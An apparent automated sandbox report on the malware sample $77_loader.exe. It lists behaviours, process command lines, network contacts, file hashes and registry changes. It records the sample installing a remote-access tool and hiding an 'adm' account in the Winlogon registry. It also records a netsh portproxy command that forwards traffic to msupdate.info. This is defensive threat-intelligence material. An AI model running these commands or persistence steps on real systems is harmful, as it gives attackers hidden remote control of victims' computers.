Analysis Overview
SHA256
3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
Threat Level: Known bad
The file $77_loader.exe was found to be: Known bad.
Malicious Activity Summary
RMS
Sets file execution options in registry
Blocklisted process makes network request
Executes dropped EXE
Downloads MZ/PE file
Loads dropped DLL
Checks computer location settings
Checks installed software on the system
Enumerates connected drives
Modifies WinLogon
Modifies powershell logging option
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Gathers network information
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-05-03 11:43
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2022-05-03 11:43
Reported
2022-05-03 11:45
Platform
win10v2004-20220414-en
Max time kernel
145s
Max time network
146s
Command Line
Signatures
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS.exe | N/A |
Sets file execution options in registry
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0" | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
Modifies powershell logging option
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SoftwareDistribution\config.xml | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\config.xml | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
Enumerates physical storage devices
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\$77_loader.exe
"C:\Users\Admin\AppData\Local\Temp\$77_loader.exe"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0coomqsh.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84F5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC84F4.tmp"
C:\Windows\system32\chcp.com
"C:\Windows\system32\chcp.com" 437
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy reset
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=80 connectaddress=msupdate.info
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
C:\Users\Admin\AppData\Local\Temp\RMS.exe
"C:\Users\Admin\AppData\Local\Temp\RMS.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | msupdate.info | udp |
| US | 8.8.8.8:53 | evcs-ocsp.ws.symantec.com | udp |
| DE | 23.51.123.27:80 | evcs-ocsp.ws.symantec.com | tcp |
| US | 8.8.8.8:53 | msupdate.info | udp |
| LT | 5.133.65.53:443 | msupdate.info | tcp |
| US | 20.42.72.131:443 | tcp | |
| LT | 5.133.65.53:80 | msupdate.info | tcp |
| N/A | 127.0.0.1:999 | tcp | |
| NL | 104.110.191.140:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 204.79.197.203:80 | tcp | |
| US | 8.8.8.8:53 | 14.110.152.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:999 | tcp | |
| RU | 77.247.243.43:5655 | tcp | |
| N/A | 127.0.0.1:999 | tcp | |
| N/A | 127.0.0.1:5650 | tcp | |
| LT | 5.133.65.53:443 | msupdate.info | tcp |
Files
memory/924-130-0x000000001BB50000-0x000000001C6AD000-memory.dmp
memory/3280-131-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\0coomqsh.cmdline
| MD5 | d857d70711643aaf2282e7c220530081 |
| SHA1 | 8f783c6b233e7675a9a6633d5ed5f44bcc5d0779 |
| SHA256 | 042f78299f09cb6b4de318cf9c2a2758606eff5bebd25d4c2fd388d3ac03f309 |
| SHA512 | 0b0603ba42bb86466c95b37dd1a0657d646dbcfe741ff7223cf6cc54a73efa307a3c49030b06c2d8727151e353ed7c98784ccfe23e88e5f444606ae5d04277af |
\??\c:\Users\Admin\AppData\Local\Temp\0coomqsh.0.cs
| MD5 | 1640a04633fee0dfdc7e22c4f4063bf6 |
| SHA1 | 3cb525c47b5dd37f8ee45b034c9452265fba5476 |
| SHA256 | 55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0 |
| SHA512 | 85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d |
memory/2412-134-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\CSC84F4.tmp
| MD5 | 1f555cf55bef11bc4dc295f80e6a3e29 |
| SHA1 | 9538a4734ecc52ac3f89b0e4411d4c61c7ae7473 |
| SHA256 | 0f53e2cfd88c6138e5784731871ef605dbc32a750c43aad3604d16ee44fe991c |
| SHA512 | cec2e94d0662b7ac497f104a11ccfe9bdfa70f0b89affbda8dc109633154a7a1e33424c48ac42c4bfb701e1df5bbf40765c1f91711e378332046c356add88928 |
C:\Users\Admin\AppData\Local\Temp\RES84F5.tmp
| MD5 | c666d634ada8f4e17b7ea27c58c45d43 |
| SHA1 | be0d200ce987774c64d211d1933bcfa59d422b06 |
| SHA256 | 81c8b1585aa586f7a713c6379c627731040ebd6548dd95d6226c4293b4a41512 |
| SHA512 | 4d0a5542d0b8ab822a592a215f50efa51d9af892deaef45566922e9754ecb36e85d4464a1b7f475f94cc70f765601a94759ab2a4ccc96537921c71480c2b260a |
C:\Users\Admin\AppData\Local\Temp\0coomqsh.dll
| MD5 | 6621e21b1f79d57fea5b7f660526cc0d |
| SHA1 | 5c1951409c8a761be7de78391ace2f7fbc972c3a |
| SHA256 | 279b9fb0494206b6562f826998ca6f2b5af552d84c142686936992c745aaae5b |
| SHA512 | 059a22049966c4562a87e8bd1145381f11110f396569823aae6ac42f96e9e03f2125eed3a062c06332dfac893990ddde73d3919f07975293c4f35aaa15f08da4 |
C:\Users\Admin\AppData\Local\Temp\0coomqsh.pdb
| MD5 | c91fc1037127f6b80d0bd8214100d8a1 |
| SHA1 | 54f0e018a94ba3394fdc0d0d7ae1266c1fa2b4ec |
| SHA256 | 81eda64e81398b2e2aa3c10f9512df43f97bbb4eff244316affc64544346d5eb |
| SHA512 | 8ed342be209b892297c5f89fa6e0866b72ae9bda20220758b26dc9ad97382135a3e105801070fbf9638851b5d47556827ca912109d5bf22d7948f3c7a08c7a1d |
memory/2876-139-0x0000000000000000-mapping.dmp
memory/4276-140-0x0000000000000000-mapping.dmp
memory/4460-141-0x0000000000000000-mapping.dmp
memory/3216-142-0x0000000000000000-mapping.dmp
memory/3348-143-0x0000000000000000-mapping.dmp
memory/1700-144-0x0000000000000000-mapping.dmp
memory/3132-145-0x0000000000000000-mapping.dmp
memory/3312-146-0x0000000000000000-mapping.dmp
memory/2808-147-0x0000000000000000-mapping.dmp
memory/3744-148-0x0000000000000000-mapping.dmp
memory/2004-149-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RMS.exe
| MD5 | 73f351beae5c881fafe36f42cde9a47c |
| SHA1 | dc1425cfd5569bd59f5d56432df875b59da9300b |
| SHA256 | a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824 |
| SHA512 | f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66 |
C:\Users\Admin\AppData\Local\Temp\RMS.exe
| MD5 | 73f351beae5c881fafe36f42cde9a47c |
| SHA1 | dc1425cfd5569bd59f5d56432df875b59da9300b |
| SHA256 | a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824 |
| SHA512 | f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66 |
Analysis: behavioral1
Detonation Overview
Submitted
2022-05-03 11:43
Reported
2022-05-03 11:46
Platform
win7-20220414-en
Max time kernel
135s
Max time network
141s
Command Line
Signatures
RMS
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
Sets file execution options in registry
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0" | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
Modifies powershell logging option
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\srvinst_x64.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\RWLN.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\RIPCServer.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\fwproc.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\progress.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\stdnames_vpd.gpd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\setupdrv.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\EULA.rtf | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms_s.lng | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui2.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unires_vpd.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmspm.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.gpd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\progress.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\install.cmd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.gpd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\srvinst.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\uninstall.cmd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Russian.lg | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\uninstall.cmd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.lng | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui2.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\SampleClient.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\setupdrv.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrvui_rms.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.ini | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\VPDAgent.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmspm.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.lng | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.hlp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unires_vpd.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\install.cmd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms_s.lng | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\ntprint.inf | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\stdnames_vpd.gpd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\English.lg | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\VPDAgent_x64.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.ini | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrvui_rms.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.hlp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\fwproc.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\ntprint.inf | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SoftwareDistribution\config.xml | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\config.xml | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| File opened for modification | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\6de8ab.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIEDF2.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\6de8ad.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\6de8af.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\6de8ab.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF266.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7ZipSfx.000\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media\1 = "DISK1;1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\7ZipSfx.000\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\36341E9D66DFD914D99C6C421757C5F9 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\PackageCode = "EE22CCA5812A64F4CB23B29D2A4A798E" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Language = "1049" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\ProductIcon = "C:\\Windows\\Installer\\{D9E14363-FD66-419D-9DC9-C62471755C9F}\\ARPPRODUCTICON.exe" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\PackageName = "rms.host6.3ru_mod.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\ProductName = "Remote Manipulator System - Host" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media\DiskPrompt = "[1]" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\36341E9D66DFD914D99C6C421757C5F9\RMS | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9 | C:\Windows\system32\msiexec.exe | N/A |
